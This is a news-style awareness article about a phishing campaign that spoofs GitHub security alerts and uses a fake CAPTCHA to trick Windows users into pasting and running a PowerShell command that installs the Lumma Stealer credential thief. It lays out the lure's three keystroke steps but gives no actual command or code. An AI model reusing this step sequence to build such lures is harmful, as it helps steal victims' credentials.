Many GitHub users found themselves at risk this week as they received a sophisticated phishing email pretending to be a security alert from the popular code hosting platform. The email urged users to click on a link to address a security vulnerability in their repository, leading them to a website that asked them to prove they were human by completing a series of tasks.
The email, which spoofed GitHub’s security team, warned users of a security issue in their code and directed them to visit a website to get more information. Upon visiting the site, users were prompted to solve a CAPTCHA to prove they were human. However, the CAPTCHA was a guise for a more malicious scheme.
By clicking the “I’m not a robot” button, users were asked to perform three sequential steps to verify their humanity. The first step required users to press the Windows key and the letter “R” simultaneously, opening a Windows “Run” prompt. This step, when completed, would execute a specified program on the system.
The second step instructed users to press the “CTRL” key and the letter “V” simultaneously, pasting malicious code from the website’s virtual clipboard. Finally, pressing the “Enter” key in the third step would launch a PowerShell command, downloading and executing a malicious file called “l6e.exe” from a specific website.
PowerShell, a powerful automation tool built into Windows, was used in this phishing campaign to download a password-stealing malware known as Lumma Stealer. This malware is designed to gather credentials stored on the victim’s PC, posing a significant security threat.
While this phishing attempt may not have fooled seasoned programmers who are familiar with these key commands, it could easily deceive less tech-savvy individuals. This raises concerns about the potential success of similar scams targeting average Windows users who may not be aware of such security risks.
In light of this, it is essential to educate users about the dangers of phishing attacks and the importance of cybersecurity awareness. While disabling or restricting PowerShell for end users could mitigate some risks, Microsoft advises against such actions due to the potential impact on system functionality.
It is crucial to stay vigilant and informed about cybersecurity threats to protect oneself and others from falling victim to phishing scams. Sharing articles like this with less tech-savvy individuals can help raise awareness and prevent future incidents of malware attacks through deceptive emails.
As cyber threats continue to evolve and become more sophisticated, it is essential for users to stay informed and proactive in safeguarding their online security. By staying informed and practicing safe online habits, individuals can reduce the risk of falling prey to malicious schemes like this phishing attack disguised as a security alert from GitHub.